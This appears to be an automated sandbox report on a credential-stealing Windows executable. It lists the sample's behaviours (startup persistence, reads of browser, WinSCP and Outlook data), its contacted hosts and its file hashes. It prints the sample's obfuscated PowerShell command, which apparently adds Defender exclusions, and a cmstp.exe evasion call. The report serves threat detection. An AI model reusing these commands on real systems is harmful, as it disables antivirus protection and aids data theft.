Malware Analysis Report

2024-11-13 17:37

Sample ID 241109-3yjsvaxpfk
Target 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
SHA256 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
Tags
agilenet collection discovery spyware stealer
Score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
7/10

SHA256

8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b

Threat Level: Shows suspicious behavior

The file 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b was found to show suspicious behavior.

Malicious Activity Summary

agilenet collection discovery spyware stealer

Executes dropped EXE

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Drops startup file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 23:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 23:55

Reported

2024-11-09 23:57

Platform

win7-20241010-en

Max time kernel

104s

Max time network

109s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

\??\c:\windows\system32\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')

C:\Windows\system32\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 poolfreshstep.com udp
RU 185.170.144.39:80 poolfreshstep.com tcp
US 8.8.8.8:53 fallback-01-static.com udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 poolfreshstep.com udp

Files


C:\Users\Admin\A.inf

MD5 961df7710c27cd2a2452c11aa48ada24
SHA1 081694e0067918b8355efef2cf72ef52d82e44b0
SHA256 d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41
SHA512 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

MD5 d00a8f6a66f5fcaf18564b6f47831294
SHA1 d1ae07fd6267b53264f1764cc45aafbfe9f5f763
SHA256 a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039
SHA512 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27


Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 23:55

Reported

2024-11-09 23:57

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
